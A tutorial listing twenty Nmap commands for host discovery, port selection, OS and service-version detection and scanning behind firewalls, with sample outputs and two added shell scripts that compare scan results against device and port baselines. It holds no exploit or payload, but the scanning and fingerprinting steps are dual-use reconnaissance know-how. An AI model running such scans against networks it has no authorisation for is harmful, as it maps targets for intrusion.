
Some Useful Nmap commands

CYBERATOR

1: Scan a single host or an IP address (IPv4)

### Scan a single IP address ###
nmap 192.168.1.1
nmap cyberator.in
nmap -v cyberator.in   ## verbose (more detailed) output; -V would only print the Nmap version

2: Scan multiple IP addresses or a subnet (IPv4)

nmap 192.168.1.1 192.168.1.2 192.168.1.3
## shorthand for several hosts in the same subnet (192.168.1.0/24): scans .1, .2 and .3
nmap 192.168.1.1,2,3 
 
You can scan a range of IP addresses too:
nmap 192.168.1.1-20
 
You can scan a range of IP addresses using a wildcard:
nmap 192.168.1.*
 
Finally, you can scan an entire subnet:
nmap 192.168.1.0/24
 

3: Read list of hosts/networks from a file (IPv4)

The -iL option reads the list of target systems from a text file, one host or network per line. This is useful for scanning a large number of hosts/networks.

Step 1: Create a text file as follows:
cat > /tmp/network.txt

Sample contents of /tmp/network.txt:
techbharat.org
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost 
 
The syntax is:
nmap -iL /tmp/network.txt
 

4: Excluding hosts/networks (IPv4)

When scanning a large number of hosts/networks you can exclude hosts from a scan:
nmap 192.168.1.0/24 --exclude 192.168.1.5
nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.254

OR exclude the hosts listed in a file called /tmp/exclude.txt:
nmap -iL /tmp/network.txt --excludefile /tmp/exclude.txt

5: Turn on OS detection, version detection, script scanning and traceroute with -A (IPv4)

nmap -A 192.168.1.254
nmap -v -A 192.168.1.1
nmap -A -iL /tmp/network.txt 
 

6: Scan an IPv6 host/address

The -6 option enables IPv6 scanning. The syntax is:

nmap -6 IPv6-Address-Here 
nmap -6 techbharat.org
nmap -6 2607:f0d0:1002:51::4
nmap -v -A -6 2607:f0d0:1002:51::4
 

7: Find out if a host/network is protected by a firewall

A -sA (TCP ACK) scan does not report open ports; it marks a port unfiltered when a RST comes back and filtered when nothing does, which shows whether a stateful firewall sits in front of the host:
nmap -sA 192.168.1.254
nmap -sA techbharat.org
 

8: Scan a host when protected by a firewall

The -PN option (spelled -Pn in current Nmap releases) skips host discovery and port-scans the target even when it does not answer pings:
nmap -PN 192.168.1.1
nmap -PN techbharat.org

9: Scan a network and find out which servers and devices are up and running

This is known as host discovery or a ping scan (the -sP option is spelled -sn in current Nmap releases; both skip the port scan):

nmap -sP 192.168.1.0/24

Sample outputs:

Host 192.168.1.1 is up (0.00035s latency).
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Host 192.168.1.2 is up (0.0038s latency).
MAC Address: 74:44:01:40:57:FB (Unknown)
Host 192.168.1.5 is up.
Host nas03 (192.168.1.12) is up (0.0091s latency).
MAC Address: 00:11:32:11:15:FC (Synology Incorporated)
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.80 second
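A ping scan is only useful to a defender once its output is compared with what is supposed to be on the network. The script below is an added example, not code from the original post: it parses the normal-output text of `nmap -sP` / `nmap -sn` into one line per live host and flags any MAC address that is not in an asset list. The scan text and the asset list are constructed for an offline run; the file name `nmap_assets` and the function names are this example's own.

```shell
#!/bin/sh
# Added example (not part of the original post): turn the normal output of an
# nmap ping scan (-sP, spelled -sn in current Nmap) into a host inventory and
# report MAC addresses that are missing from an asset list.
# Real use:  nmap -sn 192.168.1.0/24 > scan.txt
#            parse_up_hosts < scan.txt            # inventory
#            unknown_hosts assets.txt < scan.txt  # devices not in the asset list

# Print one line per live host: "<ip> <mac|-> <vendor|->".
# Reads nmap normal output on stdin. Handles the old "Host X is up" line
# used by Nmap 5.x and the newer "Nmap scan report for X" line.
parse_up_hosts() {
    awk '
        # Extract a bare IPv4 address from a host line.
        function ip_of(s) {
            if (match(s, /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/))
                return substr(s, RSTART, RLENGTH)
            return ""
        }
        # A host line starts a new record; flush the previous one first.
        /^Host .* is up/ || (/^Nmap scan report for/ && !/host down/) {
            if (ip != "") print ip, mac, vendor
            ip = ip_of($0); mac = "-"; vendor = "-"
            next
        }
        # MAC lines only appear for hosts on the local Ethernet segment.
        /^MAC Address:/ {
            mac = $3
            if (match($0, /\(.*\)/))
                vendor = substr($0, RSTART + 1, RLENGTH - 2)
            next
        }
        END { if (ip != "") print ip, mac, vendor }
    '
}

# Report hosts whose MAC is not listed in the asset file given as $1
# (one MAC per line, any letter case, "#" comments allowed). Hosts with no
# MAC are reported too: they cannot be matched against a MAC-based inventory.
unknown_hosts() {
    parse_up_hosts | awk -v assetfile="$1" '
        BEGIN {
            while ((getline line < assetfile) > 0) {
                sub(/#.*/, "", line)
                gsub(/[ \t]/, "", line)
                if (line != "") known[toupper(line)] = 1
            }
        }
        !(toupper($2) in known) { print }
    '
}

# Constructed sample: the normal output of "nmap -sP 192.168.1.0/24".
SAMPLE_SCAN='Host 192.168.1.1 is up (0.00035s latency).
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Host 192.168.1.2 is up (0.0038s latency).
MAC Address: 74:44:01:40:57:FB (Unknown)
Host 192.168.1.5 is up.
Host nas03 (192.168.1.12) is up (0.0091s latency).
MAC Address: 00:11:32:11:15:FC (Synology Incorporated)
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.80 seconds'

# Run the comparison against a constructed asset list in which only the
# router (.1) and the NAS (.12) are known devices.
demo_unknown() {
    assets="${TMPDIR:-/tmp}/nmap_assets.$$"
    printf '%s\n' '# constructed asset list' 'bc:ae:c5:c3:16:93' '00:11:32:11:15:FC' > "$assets"
    printf '%s\n' "$SAMPLE_SCAN" | unknown_hosts "$assets"
    rm -f "$assets"
}

demo_unknown
```

Running the script prints `192.168.1.2 74:44:01:40:57:FB Unknown` and `192.168.1.5 - -`: the first is a device on the segment that nobody registered, the second is a host (here the scanning machine itself) for which Nmap printed no MAC line, so it is listed for a manual check rather than silently accepted. MAC addresses are trivially spoofable, so this catches accidental additions to the network, not a deliberate intruder.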
 

10: Display the reason a port is in a particular state

nmap --reason 192.168.1.1
nmap --reason techbharat.org

11: How do I perform a fast scan?

The -F option scans only the 100 most common ports instead of the default 1000:
nmap -F 192.168.1.1

12: Only show open (or possibly open) ports

nmap --open 192.168.1.1
nmap --open techbharat.org
 

13: Show all packets sent and received

nmap --packet-trace 192.168.1.1
nmap --packet-trace techbharat.org


14: Show host interfaces and routes

This is useful for debugging: it prints the host's interfaces and routing table, similar to the output of the ip, route or netstat commands.
 
nmap --iflist

Sample outputs:

Starting Nmap 5.00 ( http://nmap.org ) at 2013-11-27 02:01 IST
************************INTERFACES************************
DEV    (SHORT)  IP/MASK          TYPE        UP MAC
lo     (lo)     127.0.0.1/8      loopback    up
eth0   (eth0)   192.168.1.5/24   ethernet    up B0:34:6F:dd:31:E5
vmnet1 (vmnet1) 192.168.121.1/24 ethernet    up 00:50:56:C0:00:01
vmnet8 (vmnet8) 192.168.179.1/24 ethernet    up 00:50:56:C0:00:08
ppp0   (ppp0)   10.1.19.69/32    point2point up
 
**************************ROUTES**************************
DST/MASK         DEV    GATEWAY
10.0.31.178/32   ppp0
209.133.67.35/32 eth0   192.168.1.2
192.168.1.0/0    eth0
192.168.121.0/0  vmnet1
192.168.179.0/0  vmnet8
169.254.0.0/0    eth0
10.0.0.0/0       ppp0
0.0.0.0/0        eth0   192.168.1.2
 

15: How to scan specific ports?

nmap -p [port] hostName
## Scan port 80  
nmap -p 80 192.168.1.1
## Scan TCP port 80
nmap -p T:80 192.168.1.1    
## Scan UDP port 53  
nmap -p U:53 192.168.1.1    
## Scan two ports ##
nmap -p 80,443 192.168.1.1    
## Scan port ranges ##
nmap -p 80-200 192.168.1.1    
## Combine all options (the U: ports are only scanned when -sU is also given, as in the last line) ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1
nmap -p U:53,111,137,T:21-25,80,139,8080 server1.cyberciti.biz
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.1.254
## Scan all ports with * wildcard ##
nmap -p "*" 192.168.1.1
## Scan top ports i.e. scan $number most common ports ##  
nmap --top-ports 5 192.168.1.1  
nmap --top-ports 10 192.168.1.1

Sample outputs:
Starting Nmap 5.00 ( http://nmap.org ) at 2013-11-27 01:23 IST
Interesting ports on 192.168.1.1:
PORT     STATE     SERVICE
21/tcp      closed      ftp
22/tcp      open        ssh
23/tcp      closed     telnet
25/tcp      closed     smtp
80/tcp      open       http
110/tcp    closed     pop3
139/tcp    closed    netbios-ssn
443/tcp    closed    https
445/tcp    closed    microsoft-ds
3389/tcp  closed    ms-term-serv
MAC Address: AA:BB:CC:DD:EE:FF (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
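A port listing like the one above is most valuable when checked against a baseline of what each host is supposed to expose. The script below is an added example, not code from the original post: it extracts the open ports from nmap normal output and reports ports that are open but not in the baseline, and baseline ports that are no longer open. The scan text and the baseline file (`nmap_baseline`) are constructed for an offline run; the function names are this example's own.

```shell
#!/bin/sh
# Added example (not part of the original post): compare the open ports in
# nmap normal output with a per-host baseline of expected open ports, so that
# a newly exposed service (or a service that disappeared) stands out.
# Real use:  nmap -p 1-1024 192.168.1.1 > scan.txt
#            port_diff baseline.txt < scan.txt

# Print "<port>/<proto>" for every port reported open (or open|filtered) in
# nmap normal output on stdin. Port lines look like "22/tcp  open  ssh".
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp|sctp)$/ && $2 ~ /^open/ { print $1 }'
}

# Given a baseline file ($1) listing expected open ports one per line
# ("#" comments allowed), report differences against the scan on stdin:
#   UNEXPECTED <port>  open in the scan but not in the baseline
#   MISSING    <port>  in the baseline but not open in the scan
# Output is sorted under the C locale so it is stable across systems.
port_diff() {
    open_ports | awk -v basefile="$1" '
        BEGIN {
            while ((getline line < basefile) > 0) {
                sub(/#.*/, "", line); gsub(/[ \t]/, "", line)
                if (line != "") expected[line] = 1
            }
        }
        { seen[$1] = 1; if (!($1 in expected)) print "UNEXPECTED", $1 }
        END { for (p in expected) if (!(p in seen)) print "MISSING", p }
    ' | LC_ALL=C sort
}

# Constructed sample: the normal output of "nmap -p 21-8080 192.168.1.1".
SAMPLE_SCAN='Starting Nmap 5.00 ( http://nmap.org ) at 2013-11-27 01:23 IST
Interesting ports on 192.168.1.1:
PORT     STATE     SERVICE
21/tcp   closed    ftp
22/tcp   open      ssh
23/tcp   closed    telnet
80/tcp   open      http
443/tcp  closed    https
8080/tcp open      http-proxy
MAC Address: AA:BB:CC:DD:EE:FF (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds'

# Run the comparison against a constructed baseline in which only ssh and
# https are supposed to be reachable on this host.
demo_port_diff() {
    base="${TMPDIR:-/tmp}/nmap_baseline.$$"
    printf '%s\n' '# constructed baseline for 192.168.1.1' '22/tcp' '443/tcp' > "$base"
    printf '%s\n' "$SAMPLE_SCAN" | port_diff "$base"
    rm -f "$base"
}

demo_port_diff
```

The constructed scan yields `MISSING 443/tcp`, `UNEXPECTED 80/tcp` and `UNEXPECTED 8080/tcp`: the HTTPS service that should be up is not answering, and two plain-HTTP listeners have appeared that nobody approved. Keeping one baseline file per host and running this after each scheduled scan turns a one-off port listing into a change alert.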
 

16: The fastest way to scan all your devices/computers for open ports ever

-T5 is the most aggressive timing template: fast on a local network, but it can miss ports or hosts on slow or lossy links.

nmap -T5 192.168.1.0/24
 

17: How to detect the remote operating system?

You can identify the remote host's operating system using the -O option (--osscan-guess makes Nmap guess more aggressively when there is no exact match):
 
nmap -O 192.168.1.1
nmap -O  --osscan-guess 192.168.1.1
nmap -v -O --osscan-guess 192.168.1.1

Sample outputs:
Starting Nmap 5.00 ( http://nmap.org ) at 2013-11-27 01:29 IST
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 01:29
Scanning 192.168.1.1 [1 port]
Completed ARP Ping Scan at 01:29, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:29
Completed Parallel DNS resolution of 1 host. at 01:29, 0.22s elapsed
Initiating SYN Stealth Scan at 01:29
Scanning 192.168.1.1 [1000 ports]
Discovered open port 80/tcp on 192.168.1.1
Discovered open port 22/tcp on 192.168.1.1
Completed SYN Stealth Scan at 01:29, 0.16s elapsed (1000 total ports)
Initiating OS detection (try #1) against 192.168.1.1
Retrying OS detection (try #2) against 192.168.1.1
Retrying OS detection (try #3) against 192.168.1.1
Retrying OS detection (try #4) against 192.168.1.1
Retrying OS detection (try #5) against 192.168.1.1
Host 192.168.1.1 is up (0.00049s latency).
Interesting ports on 192.168.1.1:
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Device type: WAP|general purpose|router|printer|broadband router
Running (JUST GUESSING) : Linksys Linux 2.4.X (95%)
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (95%)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=11/27%OT=22%CT=1%CU=30609%PV=Y%DS=1%G=Y%M=BCAEC5%TM=50B3CA
OS:4B%P=x86_64-unknown-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CB%TI=Z%CI=Z%II=I%TS=7
OS:)OPS(O1=M2300ST11NW2%O2=M2300ST11NW2%O3=M2300NNT11NW2%O4=M2300ST11NW2%O5
OS:=M2300ST11NW2%O6=M2300ST11)WIN(W1=45E8%W2=45E8%W3=45E8%W4=45E8%W5=45E8%W
OS:6=45E8)ECN(R=Y%DF=Y%T=40%W=4600%O=M2300NNSNW2%CC=N%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID
OS:=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 12.990 days (since Wed Nov 14 01:44:40 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Read data files from: /usr/share/nmap
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.38 seconds
           Raw packets sent: 1126 (53.832KB) | Rcvd: 1066 (46.100KB)
 

18: How do I detect remote service (server/daemon) version numbers?

nmap -sV 192.168.1.1

Sample outputs:
Starting Nmap 5.00 ( http://nmap.org ) at 2013-11-27 01:34 IST
Interesting ports on 192.168.1.1:
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     Dropbear sshd 0.52 (protocol 2.0)
80/tcp open  http?
1 service unrecognized despite returning data. 
 

19: Scan a host using TCP ACK (PA) and TCP SYN (PS) ping

If a firewall is blocking standard ICMP pings, try the following host discovery methods (the port list must follow the option directly, with no space):
nmap -PS 192.168.1.1
nmap -PS80,21,443 192.168.1.1
nmap -PA 192.168.1.1
nmap -PA80,21,200-512 192.168.1.1

20: Scan a host using IP protocol ping

nmap -PO 192.168.1.1
 

 

 
